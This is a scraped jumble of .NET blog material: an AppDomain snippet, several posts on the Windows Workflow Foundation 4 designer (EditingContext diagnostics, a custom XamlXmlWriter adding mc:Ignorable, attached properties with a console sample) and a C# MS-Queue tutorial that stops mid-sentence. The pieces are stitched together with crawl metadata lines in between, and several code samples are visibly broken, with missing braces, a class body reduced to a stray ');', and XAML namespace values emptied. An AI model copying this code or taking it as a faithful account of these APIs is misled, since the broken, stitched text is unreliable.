Console.WriteLine(AppDomain.CurrentDomain.FriendlyName);
In addition to creating a new application domain, the AppDomain class provides methods and properties for working with new and existing application domains.
This comprehensive list of online samples show you how to work with the current application domain and interact with other application domains.
Protection
Application domains are an essential feature of the .NET platform because they isolate applications from each other; this prevents problems in one application from affecting others running on the same platform. In addition, the AppDomain class allows you to create your own application domains to isolate tasks for various.
|
http://www.techrepublic.com/blog/software-engineer/add-stability-to-your-aspnet-applications-with-appdomains/429/
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
We:
:
I think that there is a pretty nice mix of Hadoop, Microsoft plans, and applications across these sessions. Hope you get a chance to see them (or watch them after the events!)
I’ve been hard at work here in Redmond (and with our team in Shanghai) working on getting WF ready for release. We’ve made a ton of progress in the RC build that was made available yesterday, please download it and check it out. Also, and in important bold text, if you have feedback, please, please, please file an issue on Connect so that the team can look at it right away. One thing that I want to point out about Connect is that it is not a vacuum, the entries there go directly into our bug tracking system, which we look at daily in our various shiproom meetings. If something isn’t working right, please let us know!
We’ve fixed a number of issues that came directly from Connect in this last milestone, including some areas that revealed some gaps in our testing. Your feedback is making this better. For bugs that we’ve marked as postponed, as we start planning for vNext, we will start going through those to figure out the areas we need to improve on.
It’s cool the home stretch, this morning I presented to our support team to get them prepared to handle any PSS incidents that occur. It’s great to see the release coming together.
Let’s start with some simple code (this is from a demo that I showed in my PDC talk). This is a timer activity which allows us to time the execution for the contained activity and then uses an activity action to act on the result.
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace CustomActivities.ActivityTypes
public sealed class Timer : NativeActivity<TimeSpan>
public Timer()
A few things to note about this code sample:
This part 6 of my 6 part series on the EditingContext.
I want to wrap up this series of posts by posting some code for an activity designer that functions more as a diagnostic tool, and will display all of the Items and services of the EditingContext within the designer. This will be useful from an investigation perspective, and hopefully as a diagnostic tool. We will use this to help us understand what are the services that are available out of the box in VS, as well as in a rehosted application.
We first need to create an empty activity to attach a designer to.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Activities;
using System.ComponentModel;
namespace blogEditingContext
{
[Designer(typeof(DiagnosticDesigner))]
public sealed class Diagnosticator :);
}
}
}
Now, let’s create our designer. We could do fancy treeviews or object browser style UI’s, but as this is a blog post, I want to provide you with the basics, and then let you figure out how that is most useful to you. So, we will just create a designer that writes out to debug output the relevant information.
<sap:ActivityDesigner x:Class="blogEditingContext.DiagnosticDesigner"
xmlns=""
xmlns:x=""
xmlns:sap="clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"
xmlns:
<Grid>
<Button Click="Button_Click">Debug.WriteLine Context Data</Button>
</Grid>
</sap:ActivityDesigner>
And now the code
using System.Diagnostics;
using System.Linq;
using System.Windows;
namespace blogEditingContext
{
// Interaction logic for DiagnosticDesigner.xaml
public partial class DiagnosticDesigner
{
public DiagnosticDesigner()
{
InitializeComponent();
}
private void Button_Click(object sender, RoutedEventArgs e)
{
// the goal here is to output meaningful and useful information about
// the contents of the editing context here.
int level = Debug.IndentLevel;
Debug.WriteLine("Items in the EditingContext");
Debug.IndentLevel++;
foreach (var item in Context.Items.OrderBy(x => x.ItemType.ToString()))
{
Debug.WriteLine(item.ItemType);
}
Debug.IndentLevel = level;
Debug.WriteLine("Services in the EditingContext");
foreach (var service in Context.Services.OrderBy(x => x.ToString()))
{
Debug.WriteLine(service);
}
}
}
}
Let’s break this down. The work here happens in the button click where we simply order by types’ string representations and output them to the debug writer (a more robust implementation might use a trace writer that could be configured in the app, but for this purpose, this will be sufficient.
So, what output do we get?
We determine this by using the activity in a freshly opened WF project
System.Activities.Presentation.Hosting.AssemblyContextControlItem
Yes
No
System.Activities.Presentation.Hosting.ReadOnlyState
System.Activities.Presentation.Hosting.WorkflowCommandExtensionItem
System.Activities.Presentation.View.Selection
System.Activities.Presentation.WorkflowFileItem
System.Activities.Presentation.Debug.IDesignerDebugView
System.Activities.Presentation.DesignerPerfEventProvider
System.Activities.Presentation.FeatureManager
System.Activities.Presentation.Hosting.ICommandService
System.Activities.Presentation.Hosting.IMultiTargetingSupportService
System.Activities.Presentation.Hosting.WindowHelperService
System.Activities.Presentation.IActivityToolboxService
System.Activities.Presentation.IIntegratedHelpService
System.Activities.Presentation.IWorkflowDesignerStorageService
System.Activities.Presentation.IXamlLoadErrorService
System.Activities.Presentation.Model.AttachedPropertiesService
System.Activities.Presentation.Model.ModelTreeManager
System.Activities.Presentation.Services.ModelService
System.Activities.Presentation.Services.ViewService
System.Activities.Presentation.UndoEngine
System.Activities.Presentation.Validation.IValidationErrorService
System.Activities.Presentation.Validation.ValidationService
System.Activities.Presentation.View.ActivityTypeDesigner+DisplayNameUpdater
System.Activities.Presentation.View.DesignerView
System.Activities.Presentation.View.IExpressionEditorService
System.Activities.Presentation.View.ViewStateService
System.Activities.Presentation.View.VirtualizedContainerService
This wraps up our series on the editing context. We’ve gone through the basics of why we need it, what we can do with it, and then we moved how to use it, from both the very simple to the very complex. We’ve finished with a diagnostic tool to help understand what all items I can bind to.
What’s Next From Here?
A few ideas for the readers who have read all of these:
Thanks for now!.
This part 4 of my 6 part series on the EditingContext.
In addition to having a host provide an instance of a type to be used within the designer, it can also be used to pass an instance that will route callbacks to the host. I covered this briefly in a previous post (Displaying Validation Errors in a Rehosted WF4 Designer). In that case, we provide an implementation of IValidationErrorService, which the designer infrastructure will call, if available, towards the end of a completion of a validation episode. In the sample application in that post, we use that instance to route, and display the validation errors in the system.
Rather than duplicate the code, I will simply encourage you to check out that post and think about the way you could publish a service that your activity designers know about, and use it as a mechanism for calling methods within the hosting application.
I want to briefly touch on the editing context and give a little introduction to its capabilities. This is part 1 of a 6 part series
The way to think about the editing context is that it is the point of contact between the hosting application, and the designer (and elements on the designer). In my PDC talk, I had the following slide which I think captures the way to think about how these elements are layered together.
The editing context represents the a common boundary between the hosting application and the designer, and the mechanism to handle interaction with the designer (outside of the most common methods that have been promoted on WorkflowDesigner). If you were to look at the implementation of some of the more common methods on WorkflowDesigner, you would see that almost all of these use the editing context in order to get anything done. For instance, the Flush method (and Save which calls Flush) will acquire an IDocumentPersistenceService from the Services collection, and then use that in order to properly serialize the document.
The EditingContext type has two important properties
The Items collection is for data that is shared between the host and the designer, or data that is available to all designers. These need to derive from ContextItem which will provide the mechanism to hook into subscription and change notification. There are a couple of interesting methods on the ContextItemManager type :
Services represent functionality that is either provided by the host for the designer to use, or is used by the designer to make functionality available to all designers within the editor. Generally, these are likely defined as interfaces, but can also be a type. It is then required for an implementation or an instance to be provided. This instance will be shared as a singleton. There are a few interesting methods on the ServiceManager type:
We’ll start walking through these over the next few posts.
Frequent forum guest Notre posed this question to the forums the other day noting that the XAML being produced from ActivityXamlServices.CreateBuilderWriter() was slightly different than the XAML being output from WorkflowDesigner.Save(). The reason for this stems from the fact that WorkflowDesigner leverages an additional internal type (which derives from XamlXmlWriter) in order to attach the mc:Ignorable attribute.
From the source at MSDN:.
Basically, this lets a XAML reader gracefully ignore any content marked from that namespace if it cannot be resolved. So, imagine a runtime scenario where we don’t want to load System.Activities.Presentation every time we read a WF XAML file that may contain viewstate. As a result, we use mc:Ignorable, which means the reader will skip that content when it does not have that assembly referenced at runtime.
This is what the output from the designer usually contains:
<Sequence
mc:Ignorable="sap"
mva:VisualBasic.Settings="Assembly references and imported namespaces serialized as XML namespaces"
xmlns=""
xmlns:mc=""
xmlns:mva="clr-namespace:Microsoft.VisualBasic.Activities;assembly=System.Activities"
xmlns:sap=""
xmlns:scg="clr-namespace:System.Collections.Generic;assembly=mscorlib"
xmlns:
<sap:WorkflowViewStateService.ViewState>
<scg:Dictionary x:
<x:Boolean x:True</x:Boolean>
</scg:Dictionary>
</sap:WorkflowViewStateService.ViewState>
<Persist sap:VirtualizedContainerService.
<Persist sap:VirtualizedContainerService.
<WriteLine sap:VirtualizedContainerService.
</Sequence>
mc:Ignorable will cause the ViewState and HintSize to be ignored.
If you use WorkflowDesigner.Save(), you don’t. If you want to be able to serialize the ActivityBuilder and have XAML which is what the designer produces, you need will need to add a XamlXmlWriter into the XamlWriter stack in order to get the right output. You may also worry about this if you are implementing your own storage and plan on writing some additional XAML readers or writers for additional extensibility and flexibility.
The code below describes the same approach you would need to take to implement an XamlXmlWriter that does the same thing our internal type does. While I can’t copy and paste code, this does the same thing. We do two things:
What namespaces do we ignore in the designer? Just one:
using System.IO;
using System.Xaml;
using System.Xml;
namespace IgnorableXamlWriter
class IgnorableXamlXmlWriter : XamlXmlWriter
HashSet<NamespaceDeclaration> ignorableNamespaces = new HashSet<NamespaceDeclaration>();
HashSet<NamespaceDeclaration> allNamespaces = new HashSet<NamespaceDeclaration>();
bool objectWritten;
bool hasDesignNamespace;
string designNamespacePrefix;
public IgnorableXamlXmlWriter(TextWriter tw, XamlSchemaContext context)
: base(XmlWriter.Create(tw,
new XmlWriterSettings { Indent = true, OmitXmlDeclaration = true }),
context,
new XamlXmlWriterSettings { AssumeValidInput = true })
public override void WriteNamespace(NamespaceDeclaration namespaceDeclaration)
if (!objectWritten)
allNamespaces.Add(namespaceDeclaration);
// if we find one, add that to ignorable namespaces
// the goal here is to collect all of them that might point to this
// if you had a broader set of things to ignore, you would collect
// those here.
if (namespaceDeclaration.Namespace == "")
hasDesignNamespace = true;
designNamespacePrefix = namespaceDeclaration.Prefix;
base.WriteNamespace(namespaceDeclaration);
public override void WriteStartObject(XamlType type)
// we should check if we should ignore
if (hasDesignNamespace)
// note this is not robust as mc could naturally occur
string mcAlias = "mc";
this.WriteNamespace(
new NamespaceDeclaration(
"",
mcAlias)
);
base.WriteStartObject(type);
XamlDirective ig = new XamlDirective(
"",
"Ignorable");
WriteStartMember(ig);
WriteValue(designNamespacePrefix);
WriteEndMember();
objectWritten = true;
One note on the code above, it is noted that the generation of the namespace prefix “mc” is not robust. In the product code we will check to see if mc1, mc2, … are available up to mc1000. In that case we would then append a GUID for the ugliest XML namespace known to mankind. The chance of collision up to 1000 would be a highly extreme edge case.
How would I use this? The following code shows feeding this into a CreateBuilderWriter that is passed to XamlServices.Save()
StringBuilder sb = new StringBuilder();
XamlSchemaContext xsc = new XamlSchemaContext();
var bw = ActivityXamlServices.CreateBuilderWriter(
new IgnorableXamlXmlWriter(new StringWriter(sb), xsc));
XamlServices.Save(bw,
wd.Context.Services.GetService<ModelTreeManager>().Root.GetCurrentValue());" />
I’ve been meaning to throw together some thoughts on attached properties and how they can be used within the designer. Basically, you can think about attached properties as injecting some additional “stuff” onto an instance that you can use elsewhere in your code.
In the designer, we want to be able to have behavior and view tied to interesting aspects of the data. For instance, we would like to have a view updated when an item becomes selected. In WPF, we bind the style based on the “isSelectionProperty.” Now, our data model doesn’t have any idea of selection, it’s something we’d like the view level to “inject” that idea on any model item so that a subsequent view could take advantage of. You can kind of view Attached Properties as a nice syntactic sugar to not have to keep a bunch of lookup lists around. As things like WPF bind to the object very well, and not so much a lookup list, this ends up being an interesting model.
To be clear, you could write a number of value converters that take the item being bound, look up in a lookup list somewhere, and return the result that will be used. The problem we found is that we were doing this in a bunch of places, and we really wanted to have clean binding statements inside our WPF XAML, rather than hiding a bunch of logic in the converters.
First, some types.
in diagram form:
One thing that might look a little funny to some folks who have used attached properties in other contexts (WF3, WPF, XAML), is the “IsBrowsable” property. The documentation is a little sparse right now, but what this will do is determine how discoverable the property is. If this is set to true, the attached property will show up in the Properties collection of the ModelItem to which the AP is attached. What this means is that it can show up in the Property grid, you can bind WPF statements directly to it, as if it were a real property of the object. Attached properties by themselves have no actual storage representation, so these exist as design time only constructs.
One other thing that you see on the AttachedProperty<T> is the Getter and Setter properties. These are of type Func<ModelItem,T> and Action<ModelItem,T> respectively. What these allow you to do is perform some type of computation whenever the get or set is called against the AttachedProperty. Why is this interesting? Well, let’s say that you’d like to have a computed value retrieved, such as “IsPrimarySelection” checking with the Selection context item to see if an item is selected. Or, customizing the setter to either store the value somewhere more durable, or updating a few different values. The other thing that happens is that since all of these updates go through the ModelItem tree, any changes will be propagated to other listeners throughout the designer.
Here is a very small console based app that shows how you can program against the attached properties. An interesting exercise for the reader would be to take this data structure, put it in a WPF app and experiment with some of the data binding.
First, two types:
public class Dog
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
public class Cat
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
Ignore no common base type, that actually makes this a little more interesting, as we will see.
Now, let’s write some code. First, let’s initialize and EditingContext and ModelTreeManager.
1: static void Main(string[] args)
2: {
3: EditingContext ec = new EditingContext();
4: ModelTreeManager mtm = new ModelTreeManager(ec);
5: mtm.Load(new object[] { new Dog { Name = "Sasha", Noise = "Snort", Age = 5 },
6: new Cat { Name="higgs", Noise="boom", Age=1 } });
7: dynamic root = mtm.Root;
8: dynamic dog = root[0];
9: dynamic cat = root[1];
10: ModelItem dogMi = root[0] as ModelItem;
11: ModelItem catMi = root[1] as ModelItem;
Note, lines 7-9 will not work in Beta2 (preview of coming attractions). To get lines 10-11 working in beta2, cast root to ModelItemCollection and then use the indexers to extract the values
Now, let’s build an attached property, and we will assign it only to type “dog”
1: // Add an attached Property
2: AttachedProperty<bool> ap = new AttachedProperty<bool>
3: {
4: IsBrowsable = true,
5: Name = "IsAnInterestingDog",
6: Getter = (mi => mi.Properties["Name"].ComputedValue.ToString() == "Sasha"),
7: OwnerType = typeof(Dog)
8: };
9: ec.Services.Publish<AttachedPropertiesService>(new AttachedPropertiesService());
10: AttachedPropertiesService aps = ec.Services.GetService<AttachedPropertiesService>();
11: aps.AddProperty(ap);
13: Console.WriteLine("---- Enumerate properties on dog (note new property)----");
14: dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
15:
16: Console.WriteLine("---- Enumerate properties on cat (note no new property) ----");
17: catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Let’s break down what happened here.
---- Enumerate properties on dog (note new property)----
Property : Name
Property : Noise
Property : Age
Property : IsAnInterestingDog
---- Enumerate properties on cat (note no new property) ----
Ok, so that’s interesting, we’ve injected a new property, only on the dog type. If I got dogMI.Properties[“IsAnInterestingDog”], I would have a value that I could manipulate (albeit returned via the getter).
Let’s try something a little different:
1: AttachedProperty<bool> isYoungAnimal = new AttachedProperty<bool>
3: IsBrowsable = false,
4: Name = "IsYoungAnimal",
5: Getter = (mi => int.Parse(mi.Properties["Age"].ComputedValue.ToString()) < 2)
6: };
7:
8: aps.AddProperty(isYoungAnimal);
9:
10: // expect to not see isYoungAnimal show up
11: Console.WriteLine("---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----");
12: dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
13: Console.WriteLine("---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----");
14: catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
16: Console.WriteLine("---- get attached property via GetValue ----");
17: Console.WriteLine("getting non browsable attached property on dog {0}", isYoungAnimal.GetValue(dogMi));
18: Console.WriteLine("getting non browsable attached property on cat {0}", isYoungAnimal.GetValue(catMi));
Let’s break this down:
Let’s see the output there:
---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----
---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----
---- get attached property via GetValue ----
getting non browsable attached property on dog False
getting non browsable attached property on cat True
As we can see, we’ve now injected this behavior, and we can extract the value.
Let’s get a little more advanced and do something with the setter. Here, if isYoungAnimal is set to true, we will change the age (it’s a bit contrived, but shows the dataflow on simple objects, we’ll see in a minute a more interesting case).
1: // now, let's do something clever with the setter.
2: Console.WriteLine("---- let's use the setter to have some side effect ----");
3: isYoungAnimal.Setter = ((mi, val) => { if (val) { mi.Properties["Age"].SetValue(10); } });
4: isYoungAnimal.SetValue(cat, true);
5: Console.WriteLine("cat's age now {0}", cat.Age);
Pay attention to what the Setter does now. We create the method through which subsequent SetValue’s will be pushed. Here’s that output:
---- let's use the setter to have some side effect ----
cat's age now 10
Finally, let’s show an example of how this can really function as some nice sugar to eliminate the need for a lot of value converters in WPF by using this capability as a way to store the relationship somewhere (rather than just using at a nice proxy to change a value):
1: // now, let's have a browesable one with a setter.
2: // this plus dynamics are a mini "macro language" against the model items
3:
4: List<Object> FavoriteAnimals = new List<object>();
5:
6: // we maintain state in FavoriteAnimals, and use the getter/setter func
7: // in order to query or edit that collection. Thus changes to an "instance"
8: // are tracked elsewhere.
9: AttachedProperty<bool> isFavoriteAnimal = new AttachedProperty<bool>
10: {
11: IsBrowsable = false,
12: Name = "IsFavoriteAnimal",
13: Getter = (mi => FavoriteAnimals.Contains(mi)),
14: Setter = ((mi, val) =>
15: {
16: if (val)
17: FavoriteAnimals.Add(mi);
18: else
20: FavoriteAnimals.Remove(mi);
22: })
23: };
24:
25:
26: aps.AddProperty(isFavoriteAnimal);
27:
28: dog.IsFavoriteAnimal = true;
29: // remove that cat that isn't there
30: cat.IsFavoriteAnimal = false;
31: cat.IsFavoriteAnimal = true;
32: cat.IsFavoriteAnimal = false;
33:
34: Console.WriteLine("Who are my favorite animal?");
35: FavoriteAnimals.ForEach(o => Console.WriteLine((o as ModelItem).Properties["Name"].ComputedValue.ToString()));
Little bit of code, let’s break it down one last time:
-- Who are my favorite animals?
Sasha
I will attach the whole code file at the bottom of this post, but this shows you how you can use the following:
Hopefully this post gave you some ideas about how the attached property mechanisms work within the WF4 designer. These give you a nice way to complement the data model and create nice bindable targets that your WPF Views can layer right on top of.
A few ideas for these things:
using System;
using System.Activities.Presentation;
using System.Activities.Presentation.Model;
using System.Collections.Generic;
using System.Linq;
namespace AttachedPropertiesBlogPosting
{
class Program
{
static void Main(string[] args)
{
EditingContext ec = new EditingContext();
ModelTreeManager mtm = new ModelTreeManager(ec);
mtm.Load(new object[] { new Dog { Name = "Sasha", Noise = "Snort", Age = 5 },
new Cat { Name="higgs", Noise="boom", Age=1 } });
dynamic root = mtm.Root;
dynamic dog = root[0];
dynamic cat = root[1];
ModelItem dogMi = root[0] as ModelItem;
ModelItem catMi = root[1] as ModelItem;
// Add an attached Property
AttachedProperty<bool> ap = new AttachedProperty<bool>
{
IsBrowsable = true,
Name = "IsAnInterestingDog",
Getter = (mi => mi.Properties["Name"].ComputedValue.ToString() == "Sasha"),
OwnerType = typeof(Dog)
};
ec.Services.Publish<AttachedPropertiesService>(new AttachedPropertiesService());
AttachedPropertiesService aps = ec.Services.GetService<AttachedPropertiesService>();
aps.AddProperty(ap);
Console.WriteLine("---- Enumerate properties on dog (note new property)----");
dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- Enumerate properties on cat (note no new property) ----");
catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
AttachedProperty<bool> isYoungAnimal = new AttachedProperty<bool>
{
IsBrowsable = false,
Name = "IsYoungAnimal",
Getter = (mi => int.Parse(mi.Properties["Age"].ComputedValue.ToString()) < 2)
};
aps.AddProperty(isYoungAnimal);
// expect to not see isYoungAnimal show up
Console.WriteLine("---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----");
dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----");
catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- get attached property via GetValue ----");
Console.WriteLine("getting non browsable attached property on dog {0}", isYoungAnimal.GetValue(dogMi));
Console.WriteLine("getting non browsable attached property on cat {0}", isYoungAnimal.GetValue(catMi));
// now, let's do something clever with the setter.
Console.WriteLine("---- let's use the setter to have some side effect ----");
isYoungAnimal.Setter = ((mi, val) => { if (val) { mi.Properties["Age"].SetValue(10); } });
isYoungAnimal.SetValue(cat, true);
Console.WriteLine("cat's age now {0}", cat.Age);
// now, let's have a browesable one with a setter.
// this plus dynamics are a mini "macro language" against the model items
List<Object> FavoriteAnimals = new List<object>();
// we maintain state in FavoriteAnimals, and use the getter/setter func
// in order to query or edit that collection. Thus changes to an "instance"
// are tracked elsewhere.
AttachedProperty<bool> isFavoriteAnimal = new AttachedProperty<bool>
{
IsBrowsable = false,
Name = "IsFavoriteAnimal",
Getter = (mi => FavoriteAnimals.Contains(mi)),
Setter = ((mi, val) =>
{
if (val)
FavoriteAnimals.Add(mi);
else
{
FavoriteAnimals.Remove(mi);
}
})
};
aps.AddProperty(isFavoriteAnimal);
dog.IsFavoriteAnimal = true;
// remove that cat that isn't there
cat.IsFavoriteAnimal = false;
cat.IsFavoriteAnimal = true;
cat.IsFavoriteAnimal = false;
Console.WriteLine("Who are my favorite animals?");
FavoriteAnimals.ForEach(o => Console.WriteLine((o as ModelItem).Properties["Name"].ComputedValue.ToString()));
Console.ReadLine();
}
}
public class Dog
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
public class Cat
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
}.
I got an email over the weekend asking about this, and I realized that it’s somewhat buried in this post here. Anyway, in Beta1, you often saw System.Activities.Design. For beta2 (and RTM), one important change
The primary reason for this change is that the *.Design suffix is generally reserved for VS design extensibility. As our designer ships in the framework, *.Design was not the correct suffix. *.Presentation is where we landed.
Hoping that putting this in the title lands this high up in search queries so that this post might be useful for a few people.
I!
|
https://blogs.msdn.com/b/mwinkle/default.aspx?Redirected=true&PostSortBy=MostRecent&PageIndex=1
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Bug #7877
E::Lazy#with_index should be lazy
Description
=begin
So I wanted some real benefit of being lazy. I wrote a Leibniz formula:
def leibniz(n)
(0..Float::INFINITY).lazy.with_index {|i, j| (-1 ** j) / (2*i+1).to_f }.take(n).reduce(:+)
end
But it doesn't work (well, it does, indeed. It just doesn't stop working). I got frustrated.
How about it? Don't you feel it nifty?
Of course I can wait for the release next to 2.0.0.
=end
History
#1
Updated by Nobuyoshi Nakada about 1 year ago
- File 0001-enumerator.c-Enumerator-Lazy-with_index.patch
added
- Description updated (diff)
#2
Updated by Marc-Andre Lafortune about 1 year ago
#3
Updated by Shyouhei Urabe about 1 year ago
OK, so @marcandre is interested in. I re-wrote the description in English.
#4
Updated by Marc-Andre Lafortune about 1 year ago
Note that (thanks to #7715), you can use
with_index without a block and follow it with
map:
def leibniz(n) (0..Float::INFINITY).lazy.with_index.map {|i, j| (-1 ** j) / (2*i+1).to_f }.take(n).reduce(:+) end
I'm neutral about this feature request. The problem I see is that it's too late for 2.0.0 and it would introduce potential incompatibility in next minor.
#5
Updated by Shyouhei Urabe about 1 year ago
@marcandre oh, thank you! You saved my day.
Still I want this though.
#6
Updated by Zachary Scott 11 months ago
Propose to move this to next major?
#7
Updated by Martin Dürst 11 months ago
zzak (Zachary Scott) wrote:
Propose to move this to next major?
Do you mean because of "potential incompatibility" ()? What exactly would this incompatibility be? To me, it seems that lazy.with_index would just work, so we should just fix it. Next major seems way too long to wait.
#8
Updated by Zachary Scott 9 months ago
@duerst You're probably right, since this feature was introduced in 2.0.0
If yhara-san wants to implement #with_index with a block then I see no problem with introducing this in 2.1.0
#9
Updated by Zachary Scott 9 months ago
- Tracker changed from Feature to Bug
- Subject changed from E::Lazy#with_index needed to E::Lazy#with_index should be lazy
- Target version changed from next minor to 2.1.0
- ruby -v set to 2.1.0-dev
- Backport set to 2.0.0: UNKNOWN
#10
Updated by Hiroshi SHIBATA about 1 month ago
- Target version changed from 2.1.0 to current: 2.2.0
Also available in: Atom PDF
|
https://bugs.ruby-lang.org/issues/7877
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
- Overview
- Schema
- Schema top-level elements
- <sys:environment>
- <context-root>
- <work-dir>
- <naming:web-container>
- <container-config>
- <sys:gbean>
- <ee:persistence>
- Security
- JNDI Environment References
Overview
The Geronimo-specific deployment plan for a Web application, which is usually packaged as a WAR file, is called "geronimo-web.xml". The geronimo-web.xml deployment plan is used to in conjunction with the web.xml Java EE deployment plan.
Packaging
The geronimo-web.xml Geronimo-specific deployment plan can be packaged as follows:
- Embedded in a WAR file. In this case, the geronimo-web.xml file must be placed in the /WEB-INF directory of the WAR, which is the same place where the web.xml file must be located.
- Maintained separately from the WAR file: In this case, the path to the file must be provided to the appropriate Geronimo deployer (e.g., command-line or console) when the WAR file is deployed. Note that in this case, the filename may be named something other than geronimo-web.xml but must adhere to the same schema. Also note that this will not work if the EJB JAR file is to be embedded in an enterprise application EAR file (see below).
- Embedded in an enterprise application EAR file: In one case, the root-level element <web-app> of the geronimo-web-2.0.1.xsd schema can be embedded outside the WAR file in the EAR file's geronimo-application.xml file.
- Embedded in an enterprise application EAR file: In another case, the actual geronimo-web.xml file can be placed in the /META-INF directory of the EAR, which is the same location as the application.xml file.
Schema.
Schema top-level elements:
<sys:environment>
The <sys:environment> XML element uses the Geronimo System namespace, which is used to specify the common elements for common libraries and module-scoped services, and is documented library web applications however.
An example geronimo-web.xml file is shown below using the <sys:environment> element:
<context-root>.
<work-dir>.
<naming:web-container>:
<container-config>:
<sys:gbean>.
<ee:persistence>: Java Persistence API deployment plans.
Security
Additional information and details for configuring security for Geronimo can be found here:
<security-realm-name> Security for details on how this is typically accomplished from the Geronimo Admin Console.
<sec:security>
The <sec:security> XML element uses the Geronimo Security namespace, and is documented here:
The <sec:
An example geronimo-web.xml file is shown below using the <abstract-naming-entry> element to reference a persistence unit:
.
|
https://cwiki.apache.org/confluence/display/GMOxDOC21/geronimo-web.xml
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
>>>>> "AW" ==. Drafts are discussed by the packaging committee and may, after ratification by FESCo, be written into the packaging guidelines. All of the packaging guidelines exist in the Packaging namespace on the wiki. Any other page in the wiki may be the policy of some other SIG or committee, but is not an official Fedora packaging guideline. That isn't to say that such pages aren't useful. They provide useful points for discussion. There's simply no filter on them to ensure that they are balanced, reasonable or remotely sane.. - J<
|
http://www.redhat.com/archives/epel-devel-list/2009-February/msg00075.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
C# Programming > Miscellaneous
Hearing the word "MS-Queue" for the first time might remind you of a queue data structure (like the one found in the System.Collections namespace). Although the concept is pretty close, MS-Queue is something entirely different.
The MS-Queue is a Windows component that offers an interesting mechanism to facilitate the exchange of data between software applications in the same computer or network (i.e. different sessions). The MS-Queue works as a FIFO queue at the operating system level. The data exchanged through the queue can be anything: text, images, serialized objects, etc.
Why would we need this? Picture a scenario where a system receives customer orders from an outside source at a faster rate than the system can process them. The MS-Queue would be ideal in this case since it would receive and store the orders while the application in charge of processing them simply requests the next order from the MS-Queue.
In this case, one application (i.e. service) would be in charge of receiving the orders and putting them in a Queue. A second application would be in charge of taking them out of the Queue and processing them.
Although the MS-Queue is part of most Windows operating systems components, it is usually not installed as part of the default installation. So before continuing you might have to install it.
Once installed, the developer can take advantage of it. Here is a screen shot that depicts the idea of installing the component by enabling it in the Windows component installation screen (It is similar for Windows XP, Windows Vista, or Windows 7, Windows servers, for Windows 2000 and NT is an option and need separate installation).
Now, through the Computer Management (Control Panel -> Administrative Tools) the queue can be observed. The following screen shot shows what you might see:
There are Public and Private Queues. It is common for developers to use the private queues folder. The developer has the option to create a Queue manually or programmatically. The created Queue will have a name that will be used in the code.
There are alternative programs for Queue viewers that can provide more information than the Computer Management tool. For example one tool is the MSMQ Studio by Geek Project (), It is free and works really well.
It is up to you whether you want these more advanced tools. For the purposes of this article, the default Windows tool will be sufficient.
We are almost ready to use the MS-Queue in our .NET applications. One last step is to allow the C# program to access the System.Messaging namespace. This is not a default reference! You have to go under Project > Add Reference and find it under the .NET tab. Once you have that, you are ready to use the MS-Queue in your C# applications.
Within the code, the way to reference a queue will be through its name and folder location in the Message Queue (this is known as the Queue path), for example,
string myQueuePath = @".\private$\myQueue";
It is simple to create a Queue, the example is as follows:
public static void CreateQueue(string queuePath) { try { if (!MessageQueue.Exists(queuePath)) { MessageQueue.Create(queuePath); } else { Console.WriteLine(queuePath + " already exists."); } } catch (MessageQueueException e) { Console.WriteLine(e.Message); } }
Once the queue is created, the next step is to put data by means of a message. The following example is a method that will put a new message (an image in this case) into the queue:
public void SendMessage(string _queue, string _ImagePath) { try { // prepare image for the Queue Image myImage = Bitmap.FromFile(_ImagePath); // Connect to a queue on the local computer. MessageQueue myQueue = new MessageQueue(_queue); // Prepare message Message myMessage = new Message(); myMessage.Body = myImage; myMessage.Formatter = new BinaryMessageFormatter(); // Send the message into the queue. myQueue.Send(myMessage); } catch (ArgumentException e) { Console.WriteLine(e.Message); } return; }
The data can be retrieved by indicating the Queue itself what type of message is coming out. The following code depicts the idea:
public void ReceiveMessage(string _Queue, string _Image) { try { // Connect to the a queue on the local computer. MessageQueue myQueue = new MessageQueue(_Queue); // Set the formatter to indicate body contains // an binary object myQueue.Formatter = new BinaryMessageFormatter(); // Receive and format the message. Message myMessage = myQueue.Receive(); Bitmap myImage = (Bitmap)myMessage.Body; // Save received image myImage.Save(_Image, System.Drawing.Imaging.ImageFormat.Bmp); } catch (MessageQueueException) { // Handle Message Queuing exceptions. } catch (InvalidOperationException e) { // Handle invalid serialization format. Console.WriteLine(e.Message); } catch (IOException e) { // Handle file access exceptions. } // Catch other exceptions as necessary. return; }
The developer can assign to the message Body the object to store, and the message Formatter will have the way to serialize it before storing the message into the Queue. The serialized contents are found in the BodyStream property.
An alternative path can be done by assigning to the message BodyStream a serialized object.
Now, one class is worth looking is the MessageQueueTransaction class, which offers like any other transaction processes, an all or nothing data storage.
For example, consider the case that you want to store an object and implements a particular interface:
